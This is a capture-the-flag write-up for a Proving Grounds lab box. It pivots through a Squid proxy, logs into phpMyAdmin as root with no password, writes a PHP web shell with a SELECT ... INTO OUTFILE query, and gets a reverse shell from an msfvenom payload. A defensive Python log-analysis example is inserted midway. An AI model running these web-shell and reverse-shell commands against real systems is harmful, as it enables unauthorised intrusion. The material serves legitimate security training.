Proving Grounds Practice - Squid CTF writeup.
Nmap
PORT STATE SERVICE VERSION
3128/tcp open http-proxy Squid http proxy 4.14
|_http-server-header: squid/4.14
|_http-title: ERROR: The requested URL could not be retrieved
A Squid HTTP proxy service is running on port 3128. Use Squid Pivoting Open Port Scanner to perform port scanning.
Configure the proxy server IP and port in the browser to access the web server running on port 8080.
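From the defender's side, port scanning through the proxy shows up in Squid's access.log as one client requesting many different ports on the same internal host. The Python sketch below is an added example, not part of the original writeup; the log lines are constructed, and the function names and the 5-port threshold are assumptions.

```python
import ipaddress
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample in Squid's native access.log format (not taken from the lab).
SAMPLE_LOG = """\
1700000001.101   3 10.0.0.5 TCP_MISS/503 4012 GET http://127.0.0.1:21/ - HIER_NONE/- text/html
1700000001.204   2 10.0.0.5 TCP_MISS/503 4012 GET http://127.0.0.1:22/ - HIER_NONE/- text/html
1700000001.310   2 10.0.0.5 TCP_MISS/503 4014 GET http://127.0.0.1:445/ - HIER_NONE/- text/html
1700000001.422   4 10.0.0.5 TCP_MISS/503 4016 GET http://127.0.0.1:3306/ - HIER_NONE/- text/html
1700000001.530  18 10.0.0.5 TCP_MISS/200 5120 GET http://127.0.0.1:8080/ - HIER_DIRECT/127.0.0.1 text/html
1700000090.000 950 10.0.0.9 TCP_TUNNEL/200 8211 CONNECT 192.168.1.10:443 - HIER_DIRECT/192.168.1.10 -
1700000095.000  40 10.0.0.9 TCP_MISS/200 900 GET http://www.example.com/ - HIER_DIRECT/93.184.216.34 text/html
"""

def destination(method, target):
    """Return (host, port) for a proxied request, or None if it cannot be parsed."""
    if method == "CONNECT":  # CONNECT targets are logged as host:port
        host, _, port = target.rpartition(":")
        return (host.strip("[]"), int(port)) if host and port.isdigit() else None
    parts = urlsplit(target)
    try:
        port = parts.port or {"http": 80, "https": 443}.get(parts.scheme)
    except ValueError:  # malformed port in the URL
        return None
    return (parts.hostname, port) if parts.hostname and port else None

def is_internal(host):
    """True for localhost and for loopback, private or link-local IP literals."""
    if host == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:  # a DNS name, not an IP literal
        return False
    return ip.is_loopback or ip.is_private or ip.is_link_local

def find_port_sweeps(log_text, min_ports=5):
    """Map (client, internal_host) -> sorted ports when min_ports or more were requested."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue  # not a native-format access.log line
        dest = destination(fields[5], fields[6])  # method, URL
        if dest and is_internal(dest[0]):
            seen[(fields[2], dest[0])].add(dest[1])  # keyed by client address
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_ports}

if __name__ == "__main__":
    print(find_port_sweeps(SAMPLE_LOG))
```

The fix on the proxy itself is an ACL that refuses requests whose destination is loopback or an internal range, so the log check is a backstop rather than the control.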
System Information
phpMyAdmin
Log in with username root and password as null.
Execute the SQL query below to create a reverse shell.
SELECT "<?php system($_GET['cmd'])?>" INTO OUTFILE "C:/wamp/www/shell2.php"
As shown in the phpinfo() page, the document root folder is C:/wamp/www, so the shell will be publicly accessible at http://192.168.237.189:8080/shell2.php.
Remote Code Execution
http://192.168.237.189:8080/shell2.php?cmd=whoami
Obtain Stable Shell using msfvenom
msfvenom -f exe -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=1234 -o mshell.exe
Use curl to download the shell into the attacking machine. Run an nc listener and execute the reverse shell by visiting http://192.168.237.189:8080/shell2.php?cmd=mshell.exe
Reverse shell obtained.
Thanks for reading!
For more updates and insights, follow me on Twitter: @thevillagehacker.